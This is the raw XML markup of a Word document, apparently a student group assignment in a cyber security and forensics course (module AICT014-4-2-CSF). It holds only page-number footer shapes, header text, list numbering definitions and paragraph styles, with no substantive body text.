                          <w:p w14:paraId="04DF0BF6" w14:textId="77777777" w:rsidR="0086222C"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2740" style="width:434.505pt;height:18.8pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:88.875pt;mso-position-vertical-relative:page;margin-top:746.625pt;" coordsize="55182,2387">
              <v:shape id="Shape 22741" style="position:absolute;width:55182;height:0;left:0;top:1190;" coordsize="5518214,0" path="m0,0l5518214,0">
                <v:stroke weight="1pt" endcap="flat" joinstyle="round" on="true" color="#808080"/>
                <v:fill on="false" color="#000000" opacity="0"/>
              </v:shape>
              <v:shape id="Shape 22742" style="position:absolute;width:5556;height:2387;left:24793;top:0;" coordsize="555625,238760" path="m39751,0l515874,0c537845,0,555625,17818,555625,39789l555625,198971c555625,220942,537845,238760,515874,238760l39751,238760c17780,238760,0,220942,0,198971l0,39789c0,17818,17780,0,39751,0x">
                <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 22743" style="position:absolute;width:397;height:2387;left:24793;top:0;" coordsize="39751,238760" path="m39751,238760c17780,238760,0,220942,0,198971l0,39789c0,17818,17780,0,39751,0">
                <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#808080"/>
                <v:fill on="false" color="#000000" opacity="0"/>
              </v:shape>
              <v:shape id="Shape 22744" style="position:absolute;width:397;height:2387;left:29952;top:0;" coordsize="39751,238760" path="m0,0c21971,0,39751,17818,39751,39789l39751,198971c39751,220942,21971,238760,0,238760">
                <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#808080"/>
                <v:fill on="false" color="#000000" opacity="0"/>
              </v:shape>
              <v:rect id="Rectangle 22745" style="position:absolute;width:1082;height:2474;left:27169;top:277;" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p>
                      <w:pPr>
                        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                        <w:jc w:val="left"/>
                      </w:pPr>
                      <w:fldSimple w:instr=" PAGE   \* MERGEFORMAT ">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:cs="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:ascii="Calibri"/>
                          </w:rPr>
                          <w:t xml:space="preserve">1</w:t>
                        </w:r>
                      </w:fldSimple>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
              <v:rect id="Rectangle 22746" style="position:absolute;width:411;height:2474;left:27977;top:277;"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w10:wrap type="square"/>
            </v:group>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>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0CA85" w14:textId="77777777" w:rsidR="0086222C"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E900C8C" wp14:editId="173E1B92">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>1128713</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9482138</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5518214" cy="238760"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="22702" name="Group 22702"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                  <wpg:wgp>
                    <wpg:cNvGrpSpPr/>
                    <wpg:grpSpPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5518214" cy="238760"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="5518214" cy="238760"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="22703" name="Shape 22703"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="119063"/>
                          <a:ext cx="5518214" cy="0"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="5518214">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="5518214" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:ln w="12700" cap="flat">
                          <a:round/>
                        </a:ln>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="1">
                          <a:srgbClr val="808080"/>
                        </a:lnRef>
                        <a:fillRef idx="0">
                          <a:srgbClr val="000000">
                            <a:alpha val="0"/>
                          </a:srgbClr>
                        </a:fillRef>
                        <a:effectRef idx="0">
                          <a:scrgbClr r="0" g="0" b="0"/>
                        </a:effectRef>
                        <a:fontRef idx="none"/>
                      </wps:style>
                      <wps:bodyPr/>
                    </wps:wsp>
                    <wps:wsp>
                      <wps:cNvPr id="22704" name="Shape 22704"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2479358" y="0"/>
                          <a:ext cx="555625" cy="238760"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="555625" h="238760">
                              <a:moveTo>
                                <a:pt x="39751" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="515874" y="0"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="537845" y="0"/>
                                <a:pt x="555625" y="17818"/>
                                <a:pt x="555625" y="39789"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="555625" y="198971"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="555625" y="220942"/>
                                <a:pt x="537845" y="238760"/>
                                <a:pt x="515874" y="238760"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="39751" y="238760"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="17780" y="238760"/>
                                <a:pt x="0" y="220942"/>
                                <a:pt x="0" y="198971"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="0" y="39789"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="0" y="17818"/>
                                <a:pt x="17780" y="0"/>
                                <a:pt x="3975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05" name="Shape 22705"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2479358" y="0"/>
                          <a:ext cx="39751" cy="238760"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="39751" h="238760">
                              <a:moveTo>
                                <a:pt x="39751" y="238760"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="17780" y="238760"/>
                                <a:pt x="0" y="220942"/>
                                <a:pt x="0" y="198971"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="0" y="39789"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="0" y="17818"/>
                                <a:pt x="17780" y="0"/>
                                <a:pt x="39751" y="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22706" name="Shape 22706"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2995232" y="0"/>
                          <a:ext cx="39751" cy="238760"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="39751" h="238760">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="21971" y="0"/>
                                <a:pt x="39751" y="17818"/>
                                <a:pt x="39751" y="39789"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="39751" y="198971"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="39751" y="220942"/>
                                <a:pt x="21971" y="238760"/>
                                <a:pt x="0" y="238760"/>
                              </a:cubicBezTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:ln w="28575" cap="flat">
                          <a:round/>
                        </a:ln>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="1">
                          <a:srgbClr val="808080"/>
                        </a:lnRef>
                        <a:fillRef idx="0">
                          <a:srgbClr val="000000">
                            <a:alpha val="0"/>
                          </a:srgbClr>
                        </a:fillRef>
                        <a:effectRef idx="0">
                          <a:scrgbClr r="0" g="0" b="0"/>
                        </a:effectRef>
                        <a:fontRef idx="none"/>
                      </wps:style>
                      <wps:bodyPr/>
                    </wps:wsp>
                    <wps:wsp>
                      <wps:cNvPr id="22707" name="Rectangle 22707"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2716975" y="27780"/>
                          <a:ext cx="108237" cy="247427"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="093D951F" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">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22708" name="Rectangle 22708"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2797747" y="27780"/>
                          <a:ext cx="41147" cy="247427"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="666E1E81" w14:textId="77777777" w:rsidR="0086222C"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2702" style="width:434.505pt;height:18.8pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:88.875pt;mso-position-vertical-relative:page;margin-top:746.625pt;" coordsize="55182,2387">
              <v:shape id="Shape 22703" style="position:absolute;width:55182;height:0;left:0;top:1190;" coordsize="5518214,0" path="m0,0l5518214,0">
                <v:stroke weight="1pt" endcap="flat" joinstyle="round" on="true" color="#808080"/>
                <v:fill on="false" color="#000000" opacity="0"/>
              </v:shape>
              <v:shape id="Shape 22704" style="position:absolute;width:5556;height:2387;left:24793;top:0;" coordsize="555625,238760" path="m39751,0l515874,0c537845,0,555625,17818,555625,39789l555625,198971c555625,220942,537845,238760,515874,238760l39751,238760c17780,238760,0,220942,0,198971l0,39789c0,17818,17780,0,39751,0x">
                <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 22705" style="position:absolute;width:397;height:2387;left:24793;top:0;" coordsize="39751,238760" path="m39751,238760c17780,238760,0,220942,0,198971l0,39789c0,17818,17780,0,39751,0">
                <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#808080"/>
                <v:fill on="false" color="#000000" opacity="0"/>
              </v:shape>
              <v:shape id="Shape 22706" style="position:absolute;width:397;height:2387;left:29952;top:0;" coordsize="39751,238760" path="m0,0c21971,0,39751,17818,39751,39789l39751,198971c39751,220942,21971,238760,0,238760">
                <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#808080"/>
                <v:fill on="false" color="#000000" opacity="0"/>
              </v:shape>
              <v:rect id="Rectangle 22707" style="position:absolute;width:1082;height:2474;left:27169;top:277;" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p>
                      <w:pPr>
                        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                        <w:jc w:val="left"/>
                      </w:pPr>
                      <w:fldSimple w:instr=" PAGE   \* MERGEFORMAT ">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:cs="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:ascii="Calibri"/>
                          </w:rPr>
                          <w:t xml:space="preserve">1</w:t>
                        </w:r>
                      </w:fldSimple>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
              <v:rect id="Rectangle 22708" style="position:absolute;width:411;height:2474;left:27977;top:277;"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w10:wrap type="square"/>
            </v:group>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibr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25644" w14:textId="77777777" w:rsidR="006B36D6" w:rsidRDefault="006B36D6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="158C6BD8" w14:textId="77777777" w:rsidR="006B36D6" w:rsidRDefault="006B3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BCFB0" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:t xml:space="preserve">AICT014-4-2-CSF                                                                          Group 15 – Cyber Security &amp; Forensics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F81C2" w14:textId="524FC33E" w:rsidR="0086222C" w:rsidRDefault="0086222C">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56ABE" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:t xml:space="preserve">AICT014-4-2-CSF                                                                          Group 15 – Cyber Security &amp; Forensics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71086"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="48E01528"/>
    <w:lvl w:ilvl="0" w:tplc="1F72D9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06DF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9A8C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50A7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504F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D292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70F7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045C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9210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0D7836"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08168DF2"/>
    <w:lvl w:ilvl="0" w:tplc="F716AF5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0E38C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B052F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0A3C8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28917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B0A4D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AE3E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A66A9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7C3F0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9109D5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D364268C"/>
    <w:lvl w:ilvl="0" w:tplc="24A887A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CD276C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>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AE619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2C46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E8AB3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274673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B8509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66DD1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264F5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081BCD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="980A4156"/>
    <w:lvl w:ilvl="0" w:tplc="1500227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EC45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7E72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F492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ECCB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94F3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C430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D049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308B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CB1F44"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="55D8CD84"/>
    <w:lvl w:ilvl="0" w:tplc="CBFE4C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C84F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0AE2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163F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FC01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025C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E878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A040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CE9B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3A3953"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A472571E"/>
    <w:lvl w:ilvl="0" w:tplc="B24241E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4ED5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4225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C033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A25B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743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A29F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A888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E0BA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E44439"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC94710A"/>
    <w:lvl w:ilvl="0" w:tplc="F856C51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94BCF8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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7C3256">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461F7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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16196A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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CA4962">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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D2F7A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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FAE11A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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F6E80C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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1764C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5C82DB2"/>
    <w:lvl w:ilvl="0" w:tplc="95488C1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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D458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9BE37D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EA015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68798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0AE5E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EA6A5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6C290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88053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991AA3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12267E8E"/>
    <w:lvl w:ilvl="0" w:tplc="B34E4AB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82F7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BAB5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FED6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8E4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EA4B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6658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8074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AAE7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DCD5740"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D562C8A0"/>
    <w:lvl w:ilvl="0" w:tplc="15B4214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07A8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885BA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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8A5A1E">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C4F1EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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04D214">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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C455B0">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F006E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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940316">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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B6452F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E06C1A1C"/>
    <w:lvl w:ilvl="0" w:tplc="149886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98FB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A33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62CB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AA4F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36C9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E0E1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C822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4A3C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5FD5CDA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D73A7AF0"/>
    <w:lvl w:ilvl="0" w:tplc="C68C7B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281A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FC105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1E8C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D06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D6A2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EEA6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5A30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0A85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EE63C4B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="710E8A28"/>
    <w:lvl w:ilvl="0" w:tplc="C1F4226E">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24EC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F233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846D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0E97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143D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4283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0E60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2AD7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2B675F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8264CEBE"/>
    <w:lvl w:ilvl="0" w:tplc="EDAC7C1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7820B4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F89BAE">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463EB4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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4CED08">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="31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8E7974">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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689F92">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="46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1E28AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="53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C408DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="60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0A46E3E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="382EBA06"/>
    <w:lvl w:ilvl="0" w:tplc="F8E29E4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5017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2AA4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9E15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1897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D088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DA88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7483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44E9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090B68"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="882C77BE"/>
    <w:lvl w:ilvl="0" w:tplc="182A6E1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5635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0EDF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B8E7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EC7B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E9F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9A86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86F9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7E8B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887037A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38CA03D2"/>
    <w:lvl w:ilvl="0" w:tplc="FD7C1D16">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10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569F8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8610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48B92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36ED2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ECD7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823F5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9A8C4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AED5C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E482FF8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9703AFC"/>
    <w:lvl w:ilvl="0" w:tplc="5FF6D36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1EF96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0AC62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76E35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369FA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5809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06552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AEC33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6EA40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1F9499F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="371C7B3E"/>
    <w:lvl w:ilvl="0" w:tplc="898E7B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6CF1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C2E5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BAD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467B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AE7B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ACA4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7A12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EA7F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BBF12F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="297E33E4"/>
    <w:lvl w:ilvl="0" w:tplc="08223AA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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2C15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661A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6C45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5E76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C8DE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748A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C8E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30D2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17849834">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1134713741">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="199443557">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="924918737">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="204756448">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="757945831">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1600790757">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="343166575">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="137501875">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="161047148">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1981380025">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1490370314">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1603369591">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1638532118">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1737390582">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="487328157">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="336277413">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1532887474">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2085373121">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="13964672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22C"/>
    <w:rsid w:val="002860C8"/>
    <w:rsid w:val="006B36D6"/>
    <w:rsid w:val="0086222C"/>
    <w:rsid w:val="00F5636D"/>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2500B9"/>
  <w15:docId w15:val="{56E2FFD3-60F5-47A1-AFDB-817944AB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67" w:lineRule="auto"/>
      <w:ind w:left="10" w:right="16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F4761"/>
      <w:sz w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="156" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="10" w:hanging="10"/>
      <w:jc w:val="right"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="177" w:line="402" w:lineRule="auto"/>
      <w:ind w:left="10" w:hanging="10"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>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F4761"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="Heading1"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="0F4761"/>
      <w:sz w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:link w:val="Heading2"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:hidden/>
    <w:pPr>
      <w:spacing w:after="136" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="25" w:right="167" w:hanging="10"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:hidden/>
    <w:pPr>
      <w:spacing w:after="156" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="250" w:right="183" w:hanging="10"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:hidden/>
    <w:pPr>
      <w:spacing w:after="168" w:line="259" w:lineRule="auto"/>
